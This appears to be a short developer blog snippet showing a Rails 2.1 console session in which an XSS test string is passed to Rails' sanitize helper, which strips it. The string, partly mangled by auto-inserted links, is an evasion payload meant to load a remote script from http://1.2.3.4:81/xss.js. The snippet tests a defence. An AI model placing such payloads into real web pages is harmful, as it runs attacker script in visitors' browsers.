Is good to know that we rails developers are well covered…
$ ruby script/console
Loading development environment (Rails 2.1.0)
text = 'img src=<a href="http://www.a.com/a.jpgscript">http://www.a.com/a.jpgscript</a> type=text/javascript
src=<a href="http://1.2.3.4:81/xss.js">http://1.2.3.4:81/xss.js</a> /img
src=<a href="http://www.a.com/a.jpg/script'">http://www.a.com/a.jpg/script'</a>
include ActionView::Helpers::SanitizeHelper
sanitize(text) = img src= /img src= /
